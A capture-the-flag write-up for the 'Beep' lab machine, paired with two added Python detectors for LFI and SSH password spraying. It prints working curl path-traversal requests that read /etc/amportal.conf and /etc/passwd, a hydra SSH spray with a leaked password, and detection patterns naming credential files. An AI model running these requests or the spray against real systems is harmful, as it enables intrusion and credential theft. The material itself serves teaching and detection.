Machine: Beep
IP Address: 10.10.10.7
OS type: Linux
Difficulty: Easy
First step: reconnaissance with an nmap scan.
nmap -sVC 10.10.10.7 -oN init.nmap -v
When we browse to http://10.10.10.7, it automatically redirects to https://10.10.10.7, where an Elastix login page is hosted.
Elastix is an open-source VoIP platform. We can check exploit-db for known Elastix vulnerabilities with searchsploit.
Searchsploit
searchsploit elastix
According to the searchsploit output, there is a local file inclusion exploit. Let's check it.
searchsploit -x php/webapps/37637.pl
LFI, Local File Inclusion
curl 'https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action' -k -o amportal.conf
We can include /etc/amportal.conf and save it to our Kali box. This configuration file contains a password.
We can include /etc/passwd to see which users exist on the host.
curl 'https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action' -k -o users
Six users have a bash login shell. We store their usernames in users.txt.
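The include requests above leave a clear trace in the web server's access log: a query parameter carrying directory traversal, a %00 null byte and a sensitive file name. The following detector is an added example, not part of the original writeup; it parses Apache combined-format lines (the sample lines are constructed, with documentation IP addresses) and flags any parameter showing those indicators. It goes slightly beyond the writeup by percent-decoding repeatedly, so URL-encoded forms of the same traversal are normalised before matching.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache combined log format (not from the page's target).
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 1432 "-" "curl/7.88.1"
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action HTTP/1.1" 200 981 "-" "curl/7.88.1"
192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /vtigercrm/graph.php?current_language=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 981 "-" "curl/7.88.1"
198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, request target and status code are all we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Files whose appearance in a parameter almost never has a legitimate explanation.
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "amportal.conf")


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%252e) are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def lfi_indicators(raw_value):
    """Return the list of LFI indicators present in one query-parameter value."""
    value = decode_fully(raw_value)
    found = []
    if "../" in value or "..\\" in value:
        found.append("traversal")
    if "\x00" in value:          # %00 used to cut off an appended suffix such as .php
        found.append("null-byte")
    if any(name in value for name in SENSITIVE_FILES):
        found.append("sensitive-file")
    return found


def scan_access_log(text):
    """Yield one finding per suspicious parameter; a 200 status means the include likely succeeded."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            indicators = lfi_indicators(raw)
            if indicators:
                hits.append({
                    "ip": m["ip"],
                    "status": int(m["status"]),
                    "param": name,
                    "value": decode_fully(raw),
                    "indicators": indicators,
                })
    return hits


def offenders(hits):
    """Count findings per source IP, the first thing an analyst wants for triage."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    findings = scan_access_log(SAMPLE_ACCESS_LOG)
    for f in findings:
        print(f["ip"], f["status"], f["param"], f["indicators"], f["value"])
    print("per-IP:", offenders(findings))
```

A finding with all three indicators and a 200 response should be treated as a confirmed disclosure rather than a mere attempt, since the server returned content. The real fix is in the application: an include built from a request parameter should only ever resolve against an allowlist of expected values.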
hydra
We can use hydra to try the password from amportal.conf against the SSH service for every user in users.txt.
hydra -L users.txt -p jEhdIekWmdjE ssh://10.10.10.7 -v
The password is accepted for root, so the credential from amportal.conf is reused for the root account. Now we can SSH in and collect the flags.
find / -iname 'user.txt'
find / -iname 'root.txt'
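The hydra step above produces a burst of SSH login attempts from a single source, one password across many usernames, ending in an accepted login. The following detector is an added example, not part of the original writeup; it reads OpenSSH syslog lines (the sample lines, hostnames, usernames and IP addresses are constructed) and reports any source that tries a configurable number of distinct users within a short window, together with any account the source succeeded against.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample sshd lines in syslog format (not taken from the page's target).
SAMPLE_AUTH_LOG = """\
Jan  1 10:05:01 pbx sshd[2101]: Failed password for invalid user alice from 192.0.2.10 port 50211 ssh2
Jan  1 10:05:01 pbx sshd[2103]: Failed password for bob from 192.0.2.10 port 50212 ssh2
Jan  1 10:05:02 pbx sshd[2105]: Failed password for carol from 192.0.2.10 port 50213 ssh2
Jan  1 10:05:02 pbx sshd[2107]: Failed password for dave from 192.0.2.10 port 50214 ssh2
Jan  1 10:05:03 pbx sshd[2109]: Failed password for eve from 192.0.2.10 port 50215 ssh2
Jan  1 10:05:03 pbx sshd[2111]: Accepted password for root from 192.0.2.10 port 50216 ssh2
Jan  1 10:06:30 pbx sshd[2150]: Accepted publickey for admin from 198.51.100.7 port 40001 ssh2
Jan  1 10:07:10 pbx sshd[2160]: Failed password for bob from 203.0.113.5 port 41000 ssh2
Jan  1 10:07:15 pbx sshd[2162]: Accepted password for bob from 203.0.113.5 port 41000 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted password for X".
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth_line(line):
    """Parse one sshd authentication line into a dict, or return None for other lines."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    ts = re.sub(r"\s+", " ", m["ts"])  # syslog pads single-digit days with a space
    # syslog timestamps carry no year; strptime defaults to 1900, which is fine for windowing
    return {
        "time": datetime.strptime(ts, "%b %d %H:%M:%S"),
        "result": m["result"],
        "method": m["method"],
        "user": m["user"],
        "ip": m["ip"],
    }


def detect_password_spray(text, window=timedelta(seconds=60), min_users=4):
    """Flag sources that attempt at least min_users distinct accounts within one window."""
    by_ip = defaultdict(list)
    for line in text.splitlines():
        event = parse_auth_line(line)
        if event and event["method"] == "password":  # key-based logins are not spray candidates
            by_ip[event["ip"]].append(event)

    alerts = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["time"])
        recent = deque()
        max_users = 0
        for event in events:
            recent.append(event)
            while event["time"] - recent[0]["time"] > window:
                recent.popleft()
            max_users = max(max_users, len({e["user"] for e in recent}))
        if max_users >= min_users:
            alerts.append({
                "ip": ip,
                "distinct_users": max_users,
                "attempts": len(events),
                "accepted": sorted({e["user"] for e in events if e["result"] == "Accepted"}),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_AUTH_LOG):
        print(alert)
```

The threshold keys on distinct usernames rather than failure count because a spray makes only one or two attempts per account and can slip under per-account lockout rules; a genuine user mistyping a password from one address (the 203.0.113.5 lines) is not flagged. An alert whose accepted list is non-empty, as here for root, is an active compromise and should also prompt a check for the same password being reused in other service configurations.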